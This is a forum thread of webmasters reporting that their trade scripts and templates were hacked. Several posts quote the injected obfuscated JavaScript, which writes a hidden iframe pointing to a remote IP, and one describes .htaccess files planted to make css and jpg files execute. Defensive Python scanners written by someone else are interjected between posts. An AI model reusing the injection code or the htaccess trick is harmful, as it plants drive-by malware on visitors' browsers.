
Thread: We need to talk SECURITY!!! NOW!!

  1. #21
    I need help
    Join Date
    Nov 2007
    Posts
    12

    Default

    I got almost the same problem a couple of weeks ago.
    They added an 'include css' file to my template, and the css file was in fact some exploit thingy they loaded from my ST folder.

    The way they executed the file, was to place an htaccess file which was set to execute css files, so it took a while to find it as I didn't look for a css file in my source, but the usual javascript or php include tags.

    At another site of mine they also managed to do exactly the same with a jpg file in my st thumbs folder, and a htaccess.

    The ST file scanner did Not find the htaccess in my thumbs folder, so I have suggested they include that function in coming ST releases, so we will see.

    So if you still have problems, or get it in the future remember to check for htaccess files hidden in your folders.
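An added example, not part of the post above or of any ST release: a Python sketch of the check the poster asks for, walking a web root for hidden `.htaccess` files and flagging handler directives that make static file types (css, jpg) execute as scripts. The directory names, the sample directives and the list of script handler names are constructed assumptions.

```python
import os
import re
import tempfile

# Apache directives that change how a file type is handled.
HANDLER_RE = re.compile(r"^\s*(AddHandler|AddType|SetHandler|ForceType)\b(.*)$", re.I)
# Handler / MIME names that mean "execute this" (assumed list, extend as needed).
SCRIPT_RE = re.compile(r"php|cgi-script|x-httpd", re.I)
# Extensions that should only ever be served as static content.
STATIC_EXT_RE = re.compile(r"(?:^|\s)\.?(css|jpe?g|gif|png|txt|html?)\b", re.I)

def scan_htaccess(root):
    """Return (path, lineno, directive, severity) for script-handler directives."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):  # os.walk also lists dotfiles
        for name in files:
            if name.lower() != ".htaccess":
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = HANDLER_RE.match(line)
                    if not m or not SCRIPT_RE.search(m.group(2)):
                        continue
                    # SetHandler/ForceType apply to every file in the directory.
                    whole_dir = m.group(1).lower() in ("sethandler", "forcetype")
                    static = bool(STATIC_EXT_RE.search(m.group(2)))
                    sev = "high" if (whole_dir or static) else "review"
                    findings.append((path, lineno, line.strip(), sev))
    return findings

def build_demo_tree():
    """Constructed sample tree: two planted .htaccess files and one ordinary one."""
    root = tempfile.mkdtemp(prefix="htscan_")
    samples = {
        "st": "AddHandler application/x-httpd-php .css\n",
        "st/thumbs": "# looks harmless\nAddType application/x-httpd-php .jpg\n",
        "cgi-bin": "Options -Indexes\nAddHandler cgi-script .cgi\n",
    }
    for rel, body in samples.items():
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        with open(os.path.join(root, rel, ".htaccess"), "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for path, lineno, text, sev in scan_htaccess(build_demo_tree()):
        print(f"[{sev}] {path}:{lineno}: {text}")
```

Any `.htaccess` in an upload or thumbnail directory is worth reading by hand even when it is only reported as `review`.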

  2. #22
    Baaaahhh
    Join Date
    Dec 2005
    Location
    lost
    Posts
    1,491

    Default

    ftp uploading your templates is faster (and more secure) than doing it via the ST interface.
    so go with it

  3. #23
    Just trolling
    Join Date
    May 2007
    Posts
    5

    Default same

    My sites were hacked the same way as the TS described. I changed all passes but I also can't find how they did it. I checked my computer, checked my server but found nothing.

  4. #24
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
    the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
    pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

    I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here

  5. #25
    I need help
    Join Date
    Oct 2007
    Posts
    16

    Default 203.121.69.9

    Quote Originally Posted by The Professional
    <//script//> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); <//script//>

    I wanna find out who this fucker is and hang him by his balls.....
    <iframe src="http:/ /203.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

    203.121.69.9 has no reverse. It's a Malaysian IP. Try complaining to abuse @ isp.time.net.my
    The page mentioned in the above iframe code is empty for me (with and without a referer).

    % [whois.apnic.net node-2]
    % Whois data copyright terms http :/ / www .apnic.net/db/dbcopyright.html

    inetnum: 203.121.64.0 - 203.121.127.255
    netname: TIMETELEKOM
    descr: TIME Telecommunications Sdn Bhd
    descr: Kuala Lumpur
    country: MY
    admin-c: AM59-AP
    tech-c: AM59-AP
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    remarks: This object can only be updated by APNIC hostmasters.
    remarks: To update this object, please contact APNIC
    remarks: hostmasters and include your organisation's account
    remarks: name in the subject line.
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    mnt-by: APNIC-HM
    mnt-lower: MAINT-MY-TTNET
    mnt-routes: MAINT-MY-TTNET
    changed: hostmaster @ apnic.net 20000510
    changed: hostmaster @ apnic.net 20010712
    status: ALLOCATED PORTABLE
    changed: hm-changed @ apnic.net 20040708
    source: APNIC

    person: Azmy Mohamad Yusof
    nic-hdl: AM59-AP
    e-mail: azmy @ isp.time.net.my
    e-mail: abuse @ isp.time.net.my
    address: TIMEdotNet Bhd
    address: Level 3, Lot 14 Jalan U1/26 Glenmarie HICOM Industrial Park 40000
    address: Shah Alam Selangor Malaysia
    address: [abuse] abuse @ isp.time.net.my
    phone: +6-03-50326131
    fax-no: +6-03-50326204
    country: MY
    changed: azmy @ isp.time.net.my 20030217
    mnt-by: MAINT-MY-TTNET
    source: APNIC
    Sun
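An added example, not part of the posts in this thread: a Python sketch that scans template text for the pattern quoted above (a hex string fed to `document.write(unescape(...))`) and decodes it so the hidden iframe target can be read without loading the page in a browser. The sample template is constructed and uses the documentation address 192.0.2.1; the function names are assumptions.

```python
import re

SCRIPT_BLOCK_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
SINK_RE = re.compile(r"document\.write\s*\(\s*unescape", re.I)
# Quoted run of hex digits; whitespace tolerated because editors and forums wrap it.
HEX_LITERAL_RE = re.compile(r"['\"]([0-9A-Fa-f][0-9A-Fa-f\s]{30,})['\"]")
FRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def decode_hex_literal(text):
    """Decode a hex string to text; None if it is not valid hex."""
    try:
        return bytes.fromhex(re.sub(r"\s+", "", text)).decode("latin-1")
    except ValueError:
        return None

def find_injected_scripts(template_text):
    """Report script blocks that write a hex-decoded string into the page."""
    findings = []
    for block in SCRIPT_BLOCK_RE.finditer(template_text):
        body = block.group(1)
        if not SINK_RE.search(body):
            continue
        for lit in HEX_LITERAL_RE.finditer(body):
            decoded = decode_hex_literal(lit.group(1))
            if decoded is None:
                continue
            frame = FRAME_SRC_RE.search(decoded)
            findings.append({
                "line": template_text.count("\n", 0, block.start()) + 1,
                "decoded": decoded,
                "iframe_src": frame.group(1) if frame else None,
            })
    return findings

def build_sample_template():
    """Constructed sample: a template with one injected block and one normal script."""
    hidden = ('<iframe src="http://192.0.2.1/x.php" width=2 height=2 '
              'style="display:none"></iframe>')
    payload = hidden.encode("ascii").hex().upper()
    return ("<html>\n<body>\n<p>gallery</p>\n"
            "<script> var s='" + payload + "'; var o=''; "
            "for(i=0;i<s.length;i=i+2){ o=o+'%'+s.substr(i,2);} "
            "document.write(unescape(o)); </script>\n"
            "<script>var ok='tracking';</script>\n</body>\n</html>\n")

if __name__ == "__main__":
    for hit in find_injected_scripts(build_sample_template()):
        print(f"line {hit['line']}: hidden iframe -> {hit['iframe_src']}")
```

Run it over every template and admin page, not just the public output, since later posts report the same block in admin files.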

  6. #26

    Default

    3 days ago I got exactly same shit on my AG SQL templates files!!! WTF

  7. #27

  8. #28
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    Hosteasier

  9. #29

    Default

    Quote Originally Posted by ]v[aster
    Hosteasier
    Did you get exactly same code?

  10. #30
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    The script code was the same but there was no I frame. Y?

  11. #31

    Default

    Quote Originally Posted by ]v[aster
    The script code was the same but there was no I frame. Y?
    I got exactly same code in templates files of AGS. And I got it in the same day (November 29).
    I have no ST installed.

  12. #32
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    this keeps getting more interesting.... do you have arylia installed?

  13. #33

    Default

    Quote Originally Posted by The Professional
    this keeps getting more interesting.... do you have arylia installed?
    No.
    I hit you up by icq, please answer.

  14. #34
    There are no words EonBlue's Avatar
    Join Date
    Apr 2007
    Location
    Canada
    Posts
    1,526

    Default

    Quote Originally Posted by ]v[aster
    I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
    the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
    pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

    I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here
    I don't think that the DELBY FILSECLAB.COM thing is anything malicious. It's a Windows firewall program that can block porn sites:

    Code:
    http://filseclab.com/eng/products/guardian.htm

  15. #35
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    <script> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

    I found this in my linkex admin today? soo confused...

    sorry I have been off icq for sometime now... I will sign on later today

  16. #36
    I need help
    Join Date
    Sep 2006
    Posts
    23

    Default

    > The Professional
    What release are you running? There has been an exploit in rel<=20070827

    I suppose the JavaScript is in one of the links, and not inside the <head> tags or anything? If so, when was the link added?

    - v0id

  17. #37
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    just for the benefit of the other readers here... and from the details of the conversation I and void had over icq

    I am running the most recent version... and the hack was in the admin index.php of the program... and my linkex output to my pages were left alone

  18. #38
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.

  19. #39

    Default

    Quote Originally Posted by ]v[aster
    I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.
    What forum? link please

  20. #40
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    hacked yet again today.... I seriously don't know what's going on
    hacked all my main pages directly it seems... I just overwrote them with the template file...

    except now one template file is chmod 777 and I can't change it to 444? WTF?!! digging deeper again today... if I can't figure this shit out... all my sites are for sale... fuck it
